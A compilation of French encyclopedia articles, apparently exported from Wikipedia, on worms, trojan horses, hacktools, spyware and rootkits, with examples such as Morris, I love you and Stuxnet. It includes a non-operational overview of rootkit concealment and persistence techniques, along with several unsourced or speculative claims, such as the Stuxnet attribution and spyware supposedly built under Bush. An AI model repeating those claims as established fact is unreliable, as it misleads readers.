[3] Linux n'est pas invulnérable face aux virus (http:/ / www. commentcamarche. net/ faq/ sujet-5865-linux-est-invulnerable-face-aux-virus), explication sur la vulnérabilité de Linux sur CommentCaMarche.net (2012)

[4] http:/ / fr. wikipedia. org/ w/ index. php?title=Virus_informatique& action=edit [5] Les virus à l'assaut des téléphones mobiles, M Hypponen, Pour la Science, janvier 2007, p 36-42

Liens externes

• (fr) Une brève histoire des virus (http:/ / www. linternaute. com/ hightech/ internet/ dossier/ virus/

10-virus-marquants/ 1. shtml), 10 virus marquants.

Sites généralistes

• (fr) Secuser.com (http:/ / www. secuser. com) : actualités sur la sécurité et les virus et outils en ligne ou à télécharger. • (fr) Zataz

Moteurs de recherche spécialisés

• (en) Virus Bulletin (http:/ / www. virusbtn. com/ resources/ vgrep/ index. xml)

• Portail de la sécurité informatique Ver informatique

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Le contenu de cet article ou de cette section est peut-être sujet à caution et doit absolument être sourcé. (date à renseigner) Si vous connaissez le sujet dont traite l'article, merci de le reprendre à partir de sources pertinentes en utilisant notamment les notes de fin [1] [2] de page. Vous pouvez également laisser un mot d'explication en page de discussion (modifier l'article ).

Pour les articles homonymes, voir Ver (homonymie). Un ver informatique est un logiciel malveillant qui se reproduit sur plusieurs ordinateurs en utilisant un réseau informatique comme Internet. Ver informatique 126

Historique Cette section est vide, insuffisamment détaillée ou incomplète. Votre aide [2] est la bienvenue !

Mode opératoire Un ver, contrairement à un virus informatique, n'a pas besoin d'un programme hôte pour se reproduire. Il exploite les différentes ressources de l'ordinateur qui l'héberge pour assurer sa reproduction. L'objectif d'un ver n'est pas seulement de se reproduire. Le ver a aussi habituellement un objectif malfaisant, par exemple : • espionner l'ordinateur où il se trouve ; • offrir une porte dérobée à des pirates informatiques ; •• détruire des données sur l'ordinateur où il se trouve ou y faire d'autres dégâts ; • envoyer de multiples requêtes vers un serveur Internet dans le but de le saturer (déni de service). L'activité d'un ver a souvent des effets secondaires comme : •• le ralentissement de la machine infectée ; • le ralentissement du réseau utilisé par la machine infectée ; • le plantage de services ou du système d'exploitation de la machine infectée. Des vers écrits sous forme de scripts peuvent être intégrés dans un courriel ou sur une page HTML. Ces vers sont activés par les actions de l'utilisateur qui croit accéder à des informations lui étant destinées. Un ver peut aussi être programmé en C, C++, Delphi, assembleur, ou dans un autre langage de programmation. La plupart du temps, les vers utilisent des failles de logiciels pour se propager. Ces failles sont habituellement corrigées par les éditeurs de logiciel dès que les vers apparaissent. En téléchargeant les versions les plus récentes de ses logiciels dès qu'elles apparaissent, on peut réduire grandement la probabilité d'être infecté par des vers informatiques.

Les classes de vers Cette section est vide, insuffisamment détaillée ou incomplète. Votre aide [2] est la bienvenue ! •• Vers de réseau •• Vers de courrier électronique •• Vers de messagerie instantanée •• Vers Internet •• Vers IRC •• Vers de réseaux de partage de fichiers

Exemples

Morris Le premier ver, le ver Morris, est apparu en 1988. Le Computer Emergency Response Team a alors été créé pour informer les administrateurs informatiques de problèmes de sécurité.

I love you I love you est le nom d'un ver informatique, apparu pour la première fois le 4 mai 2000 et envoyé sous forme d'une pièce jointe à un courriel intitulé I love you. Le destinataire du courriel croit que la pièce jointe est un fichier de texte. En ouvrant le fichier, l'utilisateur déclenche l'exécution d'un programme contenu dans le fichier. Ce programme explore la liste des contacts de l'utilisateur et envoie à tous ces contacts un courriel contenant la pièce Ver informatique 127

jointe infectée, assurant ainsi sa reproduction. Ce ver fut le premier à utiliser la crédulité des utilisateurs à aussi grande échelle.

Code Red Le ver Code Red a été créé en 2001 et a infecté un très grand nombre d'ordinateurs connectés à Internet.

Slammer Ce ver, apparu en 2003, a causé d'énormes ralentissements sur Internet.

Stuxnet Stuxnet est un ver informatique initialement découvert en juin 2010 par VirusBlokAda, une société de sécurité informatique basée en Biélorussie. C'est le premier ver découvert qui espionne et reprogramme des systèmes industriels. L'Iran est le pays ayant été le plus touché par ce ver. Il s'attaque principalement au contrôleur de réacteur nucléaire et aux logiciels développés par Siemens. Le but de Stuxnet était d'endommager les centrifugeuses iraniennes qui permettaient d'enrichir l'uranium. Le procédé utilisé agissait de manière aléatoire et consistait à ralentir la vitesse de rotation de centrifugeuses (ce qui, d'ailleurs, diminue l'enrichissement) puis d'augmenter leur vitesse de rotation (mais jamais au maximum pour éviter une rupture soudaine qui aurait éveillé les soupçons), finissant par causer des dysfonctionnements du matériel. Les techniciens ne s'en apercevaient pas car leurs indications étaient faussées pour afficher les valeurs nominales, ils pouvaient donc croire à un problème de conception car les problèmes survenaient de manière aléatoire. Ce programme visait tout particulièrement l'Iran car il était très spécifique au matériel et à l'architecture mis en place là-bas. Au départ, il a infecté le pc personnel d'un ingénieur travaillant dans le complexe nucléaire. Depuis son ordinateur personnel, l'ingénieur a, sans le savoir, mis le programme sur sa clé usb et l'a transmis par cet intermédiaire aux systèmes nucléaires industriels. Le ver est conçu pour pouvoir être reprogrammable, c'est-à-dire que ses concepteurs pouvaient changer son code (et donc son comportement) grâce au réseau informatique personnel de l'ingénieur. La mise à jour sur le complexe industriel nécessitait que l'homme se reconnecte avec sa clé usb sur son pc personnel puis sur les machines industrielles. Il semble que, dans un premier temps, le ver se soit contenté d'observer le fonctionnement des machines puis, en le reconfigurant, qu'il soit passé à l'attaque. Plusieurs États sont mis en cause dans sa conception et sa réalisation, bien qu'il soit très difficile d'apporter des preuves indéniables. On peut citer les États-Unis (4 failles de Windows, inconnues jusqu'alors, ont été mises en œuvre en même temps, ce qui est un exploit... à moins d'avoir les sources de Windows, et des certificats d'authentification légitimes ont été utilisés), Israël (qui soupçonne son voisin iranien de vouloir fabriquer la bombe atomique et qui aurait réalisé, sur son sol, des tests grandeur nature sur des centrifugeuses de même type que les centrifugeuses iraniennes) et l'Allemagne (Siemens est allemand et il fallait particulièrement bien connaître le système de Siemens qui pilotait le procédé nucléaire ainsi que quelques mots de passe). Il a été établi qu'une trentaine de programmeurs ont pu participer à la réalisation du ver. Ver informatique 128

Prévention et protection Des mesures simples peuvent servir à contenir un ver informatique. Vous pouvez analyser tous les fichiers suspect à l'aide de votre antivirus mais vous devez surtout maintenir tous vos logiciels à jour, y compris les logiciels non-antivirus. Ceux-ci peuvent parfois comporter des failles de sécurité qui sont corrigées dans des versions plus récentes du logiciel en question.

Les vers dans les œuvres de fiction • Dans le roman Sur l'onde de choc (1975), John Brunner, Nick Haflinger, informaticien de génie et esprit rebelle, se sert d'un ver informatique (appelé couleuvre) pour infester tous les réseaux et dévoiler automatiquement toute information compromettante. • Dans le roman Forteresse Digitale de Dan Brown, la NSA reçoit un ver informatique qui détruit ses protections et menace de dévoiler au monde ses documents classés secret-défense. • Dans le film Terminator 3, Skynet se révèle être un ver informatique. • Dans le film Opération Espadon, un ver est utilisé pour détourner de l'argent. • Dans le Film Die Hard 4, un ver informatique contamine les ordinateurs de hackers et sert de détonnateur pour les faire exploser lorsque la touche Delete est enfoncée. • Dans le Film Hackers, un ver est utilisé pour récupérer de l'argent. • Dans le Film G-Force, La taupe met un ver dans l'assistant numérique afin de rentrer dans l'ordinateur qui contient ClunterStorm.

Notes et références

[1] http:/ / fr. wikipedia. org/ w/ index. php?title=Discussion:Ver_informatique& action=edit& section=new& preload=Modèle:Initialiser_PàP

[2] http:/ / fr. wikipedia. org/ w/ index. php?title=Ver_informatique& action=edit Cheval de Troie (informatique) 129 Cheval de Troie (informatique)

Pour les articles homonymes, voir Cheval de Troie (homonymie).

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Un cheval de Troie (Trojan Horse en anglais) est un logiciel d’apparence légitime, conçu pour exécuter des actions à l’insu de l'utilisateur. En général, il utilise les droits appartenant à son environnement pour détourner, diffuser ou détruire des informations, ou encore pour ouvrir une porte dérobée (fonctionnalité inconnue de l'utilisateur légitime, qui donne un accès secret au logiciel qui permet à un pirate informatique de prendre, à distance, le contrôle de l'ordinateur). Les trojans sont programmés pour être installés de manière invisible, notamment pour corrompre l'ordinateur hôte. La principale différence entre les virus, les vers et les chevaux de Troie est que ces derniers ne se répliquent pas. Ils sont divisés en plusieurs sous-classes comprenant entre autres les portes dérobées, les logiciels espions, les droppers, etc... On peut en trouver sur des sites malveillant ou autre... Cela dépend de ce que vous téléchargez.

Historique Cette section est vide, insuffisamment détaillée ou incomplète. Votre aide [1] est la bienvenue ! Les chevaux de Troie informatiques (ou "trojan horses" en anglais) tirent leur nom d'une légende de la Grèce antique narrée dans l'Iliade, un texte homérique. Il s'agit de la méthode utilisée par les Grecs pour conquérir la ville de Troie : le héros Ulysse fait construire un immense étalon de bois qu'il place devant les portes de Troie et dans les flancs duquel il se cache avec ses compagnons. Lorsque les Troyens découvrent ce cheval, ils sont persuadés qu'il s'agit d'un cadeau divin et le font entrer dans leurs murs. Une fois la nuit tombée, Ulysse et ses compagnons sortent de leur cachette et ouvrent les portes de la ville au reste de l'armée qui pille la ville et massacre les Troyens ; le premier cheval de Troie informatique se présentait comme un jeu ou une application d'apparence légitime, mais une fois installé, il endommageait l'ordinateur hôte.

Vecteurs d'infection Une infection par un cheval de Troie fait généralement suite à l'ouverture d'un fichier contenant le logiciel malveillant. Les chevaux de Troie peuvent être contenus dans des jeux, des générateurs de clés (keygen), ou d'autres programmes modifiés (Windows Live Messenger, Adobe, Internet Explorer, etc.), téléchargés sur des sites et plateformes peu sûrs (P2P, sites non-officiels, certaines bannières de publicité et pop-ups).

Types et modes opératoires Les chevaux de Troie se répartissent en plusieurs sous-catégories, et ont chacune leur mode de fonctionnement : • Les portes dérobées sont les plus dangereux et les plus répandus des chevaux de Troie. Il s'agit d'un utilitaire d'administration à distance permettant à l'attaquant de prendre le contrôle des ordinateurs infectés via un LAN ou Internet. Leur fonctionnement est similaire à ceux des programmes d'administration à distance légitimes à la différence que la porte dérobée est installée et exécutée sans le consentement de l'utilisateur. Une fois exécutée, elle surveille le système local de l'ordinateur et n'apparait que rarement dans le journal des applications actives. Elle peut notamment envoyer, réceptionner, exécuter, supprimer des fichiers ou des dossiers, ainsi que redémarrer la machine. Son objectif est de récupérer des informations confidentielles, exécuter un code malicieux, détruire des données, inclure l'ordinateur dans des réseaux de bots, etc. Les portes dérobées combinent les fonctions de la plupart des autres types de chevaux de Troie. Certaines variantes de portes dérobées sont capables de se déplacer, Cheval de Troie (informatique) 130

mais uniquement lorsqu'elles en reçoivent la commande de l'attaquant. • Les chevaux de Troie PSW recherchent les fichiers système qui contiennent des informations confidentielles (comme les mots de passe, les détails du système, les adresses IP, les mots de passe pour les jeux en ligne, etc.) puis envoient par mail les données recueillies à la personne malintentionnée. • Les chevaux de Troie cliqueurs redirigent les utilisateurs vers des sites Web ou d'autres ressources Internet. Pour cela, ils peuvent notamment détourner le fichier hosts (sous Windows). Ils ont pour but d'augmenter le trafic sur un site Web, à des fins publicitaires ; d'organiser une attaque par déni de service ; ou de conduire le navigateur web vers une ressource infectée (par des virus, chevaux de Troie, etc.). • Les chevaux de Troie droppers installent d'autres logiciels malveillants à l'insu de l'utilisateur. Le dropper contient un code permettant l'installation et l'exécution de tous les fichiers qui constituent la charge utile. Il l'installe sans afficher d'avertissement ni de message d'erreur (dans un fichier archivé ou dans le système d'exploitation). Cette charge utile renferme généralement d'autres chevaux de Troie et un canular (blagues, jeux, images, etc.) qui, lui, a pour but de détourner l'attention de l'utilisateur ou de lui faire croire que l'activité du dropper est inoffensive. • Les chevaux de Troie proxy servent de serveur proxy. Ils sont particulièrement utilisées pour diffuser massivement des messages électroniques de spam. • Les chevaux de Troie espions sont des logiciels espions et des programmes d'enregistrement des frappes, qui surveillent et enregistrent les activités de l'utilisateur sur l'ordinateur, puis transmettent les informations obtenues (frappes du clavier, captures d'écran, journal des applications actives, etc.) à l'attaquant. • Les chevaux de Troie notificateurs sont inclus dans la plupart des chevaux de Troie. Ils confirment à leurs auteurs la réussite d'une infection et leur envoient (par mail ou ICQ) des informations dérobées sur l'ordinateur attaqué (adresse IP, ports ouverts, adresses de courrier électronique, etc.). • Les bombes d'archives sont des fichiers archivés infectés, codés pour saboter l'utilitaire de décompression (par exemple, Winrar ou Winzip) qui tente de l'ouvrir. Son explosion entraîne le ralentissement ou le plantage de l'ordinateur, et peut également noyer le disque avec des données inutiles. Ces bombes sont particulièrement dangereuses pour les serveurs. • Les Man in the Browser (en) infectent les navigateurs web.

Symptômes d'une infection •• Activité anormale du modem, de la carte réseau ou du disque dur (des données sont chargées en l'absence d'activité de la part de l'utilisateur) •• Réactions curieuses de la souris •• Ouvertures impromptues de programmes ; du lecteur CD/DVD •• Plantages répétés •• Redémarrage répété du système

Prévention et lutte Pour lutter contre ce genre de programme malveillant, l'utilisation d'un antivirus et d'un pare-feu peut s'avérer efficace, mais reste souvent insuffisante. Il est conseillé d'utiliser en priorité un anti-malware (par exemple : Malwarebytes', Anti-Malware, Ad-Aware, Windows Defender, etc.) et de faire une analyse complète de son système d'exploitation. Dans certains cas[2], l'utilisateur peut se retrouver obligé de démarrer sur un autre système d'exploitation, puis de redémarrer en mode sans échec pour pouvoir reprendre la main. Cheval de Troie (informatique) 131

Exemples •• Socket23 •• Back Orifice • Darkcomet-RAT (N'est pas un trojan à l'origine, il s'agissait d'un logiciel pour gérer les PC à distance, mais a été détourné par des pirates, de telle sorte que l'auteur d’origine arrête de développer)[3] • Poison Ivy[4] (Active) • Y3k RAT[5] (Inactive) • LANfiltrator[6] •• BlackShades NET •• Hadès-RAT •• Bihrat

Notes et références • Cet article est principalement issu de l'article de viruslist.com [7]

[1] http:/ / fr. wikipedia. org/ w/ index. php?title=Cheval_de_Troie_(informatique)& action=edit

[7] http:/ / www. viruslist. com/ fr/ virusesdescribed?chapter=161595138

Hacktool

Hacktool est un logiciel malveillant utilisé par des hackers dans différents buts. Il inclut entre autres des balayeurs de port, des renifleurs, un enregistreur de frappe et des outils d'envoi de pourriel (spam). On retrouve ce logiciel sous différents noms : HackTool, HackTools, Hack Tool, Hack Tools, Hacktool Spammer, Flooder, Hacking Tool ou encore Hacking Tools.

Conséquences Ce logiciel, en général non viral, présente peu de risques pour l'internaute, bien qu'il puisse se faire voler ses mots de passe. Cependant, il peut être utilisé pour une attaque à venir, aussi bien du réseau que de la machine infectée.

• Portail de la sécurité informatique Logiciel espion 132 Logiciel espion

Un logiciel espion (aussi appelé mouchard ou espiogiciel ; en anglais spyware) est un logiciel malveillant qui s'installe dans un ordinateur dans le but de collecter et transférer des informations sur l'environnement dans lequel il s'est installé, très souvent sans que l'utilisateur en ait connaissance. L'essor de ce type de logiciel est associé à celui d'Internet qui lui sert de moyen de transmission de données. Le terme de Logiciel espion, dont l'usage est préconisé par la commission générale de terminologie et de néologie en France, contrairement à l'anglicisme spyware ou au terme québécois espiogiciel, est une traduction du mot anglais spy, qui est une contraction de espion et software (logiciel). Son utilisation est recommandée par le GDT[1].

Historique Cette section est vide, insuffisamment détaillée ou incomplète. Votre aide [2] est la bienvenue ! • Des logiciels espion ont été développés sous G W Bush, pour préparer l'attaque Stuxnet.

Vecteurs d'infection Les logiciels espions sont souvent inclus dans des logiciels gratuits et s'installent généralement à l'insu de l'utilisateur. Ils ne sont généralement actifs qu'après redémarrage de l'ordinateur. Certains, comme Gator, sont furtifs et ne se retrouvent donc pas dans la table des processus (accès : {Ctrl+alt+suppr} pour Windows, {ps} pour Unix). Un logiciel anti-espion performant peut toutefois les détecter et envoie une alerte avant leur installation. Les logiciels espions sont développés principalement par des sociétés proposant de la publicité sur Internet. Pour permettre l'envoi de publicité ciblée, il est nécessaire de bien connaître sa cible. Cette connaissance peut être facilement obtenue par des techniques de profilage dont le logiciel espion fait partie. Le logiciel espion attaque très souvent les systèmes Microsoft Windows du fait de leur popularité et surtout du bureau lancé avec la totalité des droits la plupart du temps. Certaines pages Web peuvent, lorsqu'elles sont chargées, installer à l'insu de l'utilisateur un logiciel espion, généralement en utilisant des failles de sécurité du navigateur de la victime. Les logiciels espions sont souvent présents dans des gratuiciels, ou des partagiciels, afin de rentabiliser leur développement. Certains gratuiciels cessent de fonctionner après la suppression de l'espiogiciel associé. On ne connaît pas de logiciels libres — comme Mozilla Firefox — qui contiennent des logiciels espions. Enfin, certains administrateurs systèmes ou administrateurs réseaux installent ce type de logiciel pour surveiller à distance l'activité de leurs ordinateurs, sans avoir à se connecter dessus. Les principaux vecteurs d'infections sont : • les logiciels de cassage de protection (type cracks et keygens) • les faux codecs • certains logiciels gratuits (certaines barres d'outils ou utilitaires par exemple) • les faux logiciels de sécurité (rogues) •• la navigation sur des sites douteux, notamment ceux au contenu illégal • les pièces jointes et les vers par messagerie instantanée Logiciel espion 133

Mode opératoire Un logiciel espion est composé de trois mécanismes distincts : • Le mécanisme d'infection, qui installe le logiciel. Ce mécanisme est identique à celui utilisé par les virus, les vers ou les chevaux de Troie. Par exemple, l'espiogiciel Cydoor utilise le logiciel grand public Kazaa comme vecteur d'infection ; •• Le mécanisme assurant la collecte d'information. Pour l'espiogiciel Cydoor, la collecte consiste à enregistrer tout ce que l'utilisateur recherche et télécharge via le logiciel Kazaa. • Le mécanisme assurant la transmission à un tiers. Ce mécanisme est généralement assuré via le réseau Internet. Le tiers peut être le concepteur du programme ou une entreprise. Le logiciel espion peut afficher des offres publicitaires, télécharger un virus, installer un cheval de troie (ce que fait WhenU.SaveNow, par exemple), capturer des mots de passe en enregistrant les touches pressées au clavier (keyloggers), espionner les programmes exécutés à telle ou telle heure, ou encore espionner les sites Internet visités.

Prévention et lutte

Prévention De manière générale, avant d'installer un logiciel, l'utilisateur devrait être sûr de sa provenance, qu'il s'agisse d'un téléchargement sur internet ou d'un cédérom. Pour limiter les risques, l'internaute devrait privilégier les sites de téléchargement connus ou le site de l'éditeur, et prendre des renseignements complémentaires sur ces sites ou sur des forums spécialisés (malekal.com par exemple). Pour les utilisateurs non-néophytes, l'utilisation des logiciels libres peut être un moyen de lutter contre les logiciels espions. En effet, les sources de ces logiciels sont disponibles, vérifiables et modifiables, ce qui permet la détection et l'élimination de logiciels espions de ces programmes s'ils en contiennent. Dans les logiciels non libres les sources ne sont pas disponibles, il est donc plus difficile de détecter la présence de ce genre de menace et impossible de l'éliminer. Certains programmes soi-disant destinés à lutter contre les logiciels espions contiennent eux-mêmes ce type de menace[3], ou se révèlent totalement inefficaces avec pour seul but de facturer une licence d'utilisation (cas de Spyware Assassin par exemple) [4]. Le contrôle des flux sortants est la plupart du temps réalisé par l'administrateur réseau. Par l'intermédiaire d'un pare-feu, le contrôle des flux sortants bloque toute connexion qui tente de s'effectuer à partir de l'ordinateur (ou du réseau interne) vers l'extérieur (généralement Internet), sauf les connexions autorisées préalablement (on autorise généralement les connexions vers des sites Web, mais on autorise moins souvent le poste-à-poste). Même si le contrôle des flux sortants est encore peu mis en place à l'heure actuelle, il est primordial dans la compréhension et le blocage de certains problèmes, comme la présence de logiciels espions, car ils vont être amenés à se connecter à l'extérieur pour envoyer les informations qu'ils auront recueillies.

Logiciels anti-espions Article détaillé : Catégorie:Logiciel anti-espion. Il existe plusieurs logiciels spécialisés dans la détection et la suppression de spywares, mais leur utilisation tend à être désuète, car la plupart des logiciels antivirus et des anti-malwares (comme Malwarebytes' Anti-Malware) proposent de traiter ce type de programme indésirable. À noter que certains programmes malveillants, appelés rogues, sont de faux anti-espions qui installent en fait des spywares[5]. La plupart des anti-spywares gratuits (comme A-squared ou Spybot - Search & Destroy) sont bridés dans leur version gratuite (pas de protection en temps réel par exemple). Certains anti-spywares payants (comme Terminator, Spyware Doctor, Webroot, etc.), sont aussi complets que les antivirus classiques. À l'instar des antivirus, les logiciels Logiciel espion 134

anti-espions utilisent des bases de données fréquemment mises à jour (certaines mises à jour sont manuelles). En revanche, contrairement à la croyance populaire, il n'est pas recommandé d'utiliser plusieurs logiciels de détection ou de désinfection (cela augmente les risques de plantage et de ralentissement de l'ordinateur)[6].

Notes et références

[2] http:/ / fr. wikipedia. org/ w/ index. php?title=Logiciel_espion& action=edit

Rootkit

Un rootkit (le nom « outil de dissimulation d'activité » est également utilisé[1]), parfois simplement « kit », est un ensemble de techniques mises en œuvre par un ou plusieurs logiciels, dont le but est d'obtenir et de pérenniser un accès (généralement non autorisé) à un ordinateur de la manière la plus furtive possible[2],[3],[4], à la différence d'autres logiciels malveillants. Le terme peut désigner la technique de dissimulation ou plus généralement un ensemble particulier d'objets informatiques mettant en œuvre cette technique. Leur furtivité est assurée par plusieurs mécanismes de dissimulation (voir infra) : effacement de traces, masquage de l'activité et des communications, etc. Un rootkit peut s'installer dans un autre logiciel, une bibliothèque ou dans le noyau d'un système d'exploitation. Certains peuvent modifier l'hyperviseur fonctionnant au-dessus des systèmes ou le micrologiciel intégré dans un matériel. La plupart des rootkits servent à installer des logiciels malveillants sur les machines où l'accès est obtenu. Certains fournisseurs de matériels informatiques, tel Sony, les utilisent pour s'assurer du respect des conditions d'utilisation de leurs produits par leurs clients. Certains kits ne jouent pas sur la discrétion mais sur le fait qu'enlever le kit serait une opération ardue[5]. Pour l'« attaquant », l'utilité d'un rootkit est soit de mettre à disposition des ressources système (temps processeur, connexions réseaux, etc.) sur une, voire plusieurs machines (voir infra), parfois en utilisant la « cible » comme intermédiaire pour une autre attaque ; soit d'espionner, d'accéder aux données stockées ou en transit sur la machine cible[5]. Ils sont généralement classés parmi les logiciels malveillants, mais pas toujours[4] ; ils peuvent utiliser des « techniques virales » pour se transmettre (par exemple, en utilisant un virus ou un cheval de Troie)[6]. Il existe des outils de détection et des méthodes de protection pour les contrer mais elles ne sont pas totalement efficaces.

Historique En 1989 sont apparus des programmes manipulant les logs système (un log est un « journal des opérations », sorte de livre de bord où sont enregistrées les informations concernant l'état et l'activité d'un ordinateur) pour cacher leur présence. D'autres programmes permettaient de se dissimuler en manipulant les outils servant à vérifier les informations sur les utilisateurs, telles que les commandes who, w, ou last[7], et ainsi être invisibles pour les administrateurs des machines. Les premiers rootkits sont apparus en 1994 sur Linux et SunOS[7],[3] ; en 1998, sous Windows, avec le célèbre Back Orifice (voir infra) ; et en 2004 apparaissait le premier rootkit sous Mac OS X, WeaponX[8]. Les analyses et les recherches sur les rootkits ont commencé à partir de 1997, avec la publication par le webzine Phrack d'un cheval de Troie détournant une partie du noyau Linux (le LKM, qui permet d'ajouter des modules au noyau pendant son fonctionnement)[3] et ouvrant la porte aux techniques des rootkits actuels. Depuis, de nombreuses recherches et analyses ont été conduites : Phrack et plusieurs autres sites Web[9] publient régulièrement des travaux sur les rootkits. Certains projets se sont spécialisés dans ce domaine, comme chkrootkit débuté en 1997, dédié au développement d’un outil de détection de rootkits pour les plates-formes Linux, * BSD (FreeBSD, OpenBSD ...), Solaris et HP-UX. Rootkit 135

La mise au jour de rootkits passe par leur publication ou se fait grâce aux honeypots, des machines sciemment vulnérables utilisées par les professionnels de la sécurité pour analyser le mode opératoire d'un attaquant. Les résultats obtenus sont régulièrement évoqués lors de conférences sur la sécurité, comme la conférence Black Hat. Certains rootkits peuvent être légitimes, pour permettre aux administrateurs de reprendre le contrôle d'une machine défaillante, pour suivre un ordinateur volé[10], ou dans certains outils comme des émulateurs de disque (DAEMON Tools, Alcohol 120%)[11]. Mais le terme a perdu ce sens historique et évoque essentiellement des outils à finalité malveillante.

Mode opératoire

Contamination La première phase d'action d'un rootkit consiste généralement à trouver un hôte vulnérable par balayage d'un ensemble d'adresses IP ou grâce à une base de données d'IP vulnérables[5]. L'étape suivante consiste à chercher à obtenir un accès au système, sans forcément que celui-ci soit un accès privilégié (ou en mode administrateur). Il existe trois manières de contaminer un système, en suivant les techniques habituelles des programmes malveillants. Il est possible de mettre en œuvre un exploit, c'est-à-dire profiter d'une vulnérabilité de sécurité connue ou non, à n'importe quel niveau du système (application, système d'exploitation, BIOS, etc.) Cette mise en œuvre peut être le fait d'un virus, mais elle résulte aussi souvent de botnets qui réalisent des scans de machines pour identifier et exploiter les failles qui sont utiles à l'attaque. Même s'il n'est pas un virus à proprement parler, un rootkit peut utiliser des techniques virales pour se transmettre, notamment par un cheval de Troie. Un virus peut avoir pour objet de répandre des rootkits sur les machines infectées. A contrario, un virus peut aussi utiliser les techniques utilisées par des rootkits pour parfaire sa dissimulation[]. Enfin, l’attaque par force brute permet d'accéder au système en profitant de la faiblesse des mots de passe de certains utilisateurs : il suffit de tester les mots de passe les plus courants. Des outils, nommés « autorooters », réunissent ces opérations de scan et d'exploit en une seule, ce qui peut faciliter la tâche de script kiddies[12] en laissant toutefois beaucoup de traces sur le réseau.

Modification du système et dissimulation Une fois la contamination effectuée et l'accès obtenu, la phase suivante consiste à installer, au moyen de son script d'installation, les objets et outils nécessaires au rootkit[5] ; c'est-à-dire les objets (programmes, bibliothèques) permettant la mise en place de la charge utile du rootkit, s'ils n'ont pas pu être installés durant la phase de contamination, ainsi que les outils et les modifications nécessaires à la dissimulation[13]. L'ouverture de portes dérobées, afin de permettre le contrôle de la machine, d'installer la charge utile et de pérenniser l'accès au système[2],[14] est une technique très fréquente.

Dissimulation Le rootkit cherche à dissimuler son activité pour minimiser le risque qu'on le découvre, afin de profiter le plus longtemps possible de l'accès frauduleux, mais aussi pour rendre sa désinstallation difficile[5]. Il va notamment dissimuler ses propres fichiers, les autres fichiers utilisés par l'attaquant, les processus qu'il exécute et les connexions qu'il va ouvrir[15]. Cette faculté de dissimulation le différencie des virus, qui cherchent principalement à se répandre, bien que ces deux fonctions soient parfois jumelées pour une efficacité supérieure. Plusieurs méthodes de dissimulation peuvent être combinées. Rootkit 136

La dissimulation de processus informatiques ou de fichiers permet de cacher l'activité du rootkit. Sous Windows, cela peut être réalisé en modifiant certaines clés de la base de registre ; sous systèmes Unix l'attaquant peut remplacer la commande ls pour qu'elle n'affiche pas certains dossiers[16]. Une fois en place, le rootkit peut supprimer ses propres fichiers d'installation pour éviter qu'il ne soit reconnu par une recherche de fichiers[5]. Certains objets exécutables ou certaines bibliothèques sont remplacés par des programmes malveillants contrôlables à distance (chevaux de Troie), tout en conservant leur horodatage[16]. Il est également possible de détourner certains appels aux tables de travail utilisées par le système[17] par hooking, de manière à ce que des programmes d'apparence légitime exécutent les fonctions voulues par l'attaquant. L'obtention des droits supérieurs par élévation des privilèges est également fréquemment rencontrée : cela permet notamment de désactiver les mécanismes de défense (comme un anti-virus) ou d'agir sur des objets de haut niveau de privilèges (pilotes de périphériques, noyau du système, etc.) Un rootkit va ainsi pouvoir écouter les transactions sur le réseau pour trouver des mots de passe non chiffrés (comme des connexions ftp) ou détourner une connexion ssh en interceptant l'appel système où le mot de passe n'est pas encore chiffré[18]. Le rootkit tente de ne pas apparaître dans les fichiers log[15]. Pour cela, il efface certaines entrées des logs ou, de manière beaucoup plus sophistiquée, utilisera des techniques de type « Stealth by Design » (« furtif par conception »)[19], à savoir implémenter à l'intérieur du rootkit des fonctions système afin de ne pas avoir à appeler les fonctions standards du système d'exploitation et ainsi éviter l'enregistrement d'événements système suspects[15]. Il peut ainsi désactiver certains daemons et l'historique des shells[5]. Enfin, certains rootkits peuvent se charger intégralement en mémoire, ne laissant ainsi aucune trace sur les périphériques de stockage de la machine[20]. En revanche, certaines activités ne pourront pas facilement être camouflées, notamment ce qui concerne la charge utile qui engendre de la charge réseau ou processeur (voir infra) ; l'effort de dissimulation se portera alors sur les communications entre le rootkit et l'attaquant pour protéger et maintenir l'accès frauduleux.

Maintien de l'accès Un rootkit doit pouvoir être manipulé à distance par un attaquant. Celui-ci cherche donc souvent à maintenir un shell (ou « interpréteur de commandes ») disponible idéalement à n'importe quel moment (ou au moins durant l'installation du rootkit), en remplaçant des commandes comme ping ou xterm. Généralement, l'attaquant installe plusieurs de ces portes dérobées au cas où l'une viendrait à être découverte et supprimée[21]. L'accès distant au kit peut se faire par l'intermédiaire d'une connexion TCP, comme telnet ou ssh (qui peut être renversée, c'est-à-dire que c'est la machine infectée qui va chercher à rentrer en contact avec l'attaquant), UDP ou ICMP. Il existe aussi des méthodes plus complexes mais plus discrètes : port knocking, faux paquet TCP contenant une commande cachée, se faire passer pour une autre machine[21], canaux cachés, etc. Au besoin, les scripts de démarrage seront modifiés pour que les services nécessaires au rootkit soient disponibles après chaque redémarrage de la machine[5]. Pour que l'accès à la machine ne soit pas détourné par un autre attaquant, celui-ci peut corriger les failles du système infecté : celles qui lui ont permis de rentrer, voire l'ensemble des failles connues. Rootkit 137

Mise en place de la charge utile

La charge utile est la partie active du rootkit (et de tout programme malveillant en général), dont le rôle est d'accomplir la (ou les) tâche(s) assignée(s). Cette charge utile permet d'avoir accès aux ressources de la machine infectée[5], et notamment le processeur, pour décrypter des mots de passe, pour effectuer des calculs distribués à des fins malveillantes ou pour mettre en œuvre (ou détourner l'usage légitime) des applications comme un serveur de messagerie afin d'envoyer des mails (pourriel ou spam) en quantité. Les ressources réseaux intéressent également les Un botnet permet d'avoir un accès sur des attaquants, la machine pouvant alors servir de base pour d'autres centaines de machines. attaques (DDoS[22], exploits) ou pour inspecter, sniffer l'activité réseau.

Le remplacement du procédé de connexion (comme /bin/login sous les Unix) peut aussi fournir soit un accès de type porte dérobée (voir infra), soit un moyen de récupérer les informations d'authentification des utilisateurs de la machine. La compromission de pilotes de périphériques permet également d'installer des enregistreurs de frappe ou keyloggers (entre autres), afin de récupérer, en complément de l'activité réseau, des traces et des informations personnelles ou confidentielles, comme le seraient des données bancaires ou de connexion. La machine infectée peut aussi devenir le point de départ pour d'autres attaques, sur internet, ou sur l'intranet, comme un déni de service[18]. La prise de contrôle de la machine offre la possibilité de constituer un réseau de type botnet (la machine infectée devenant alors une machine zombie, comme dans le cas du botnet Srizbi[23]), ou d'accéder à d'autres machines, par rebond.

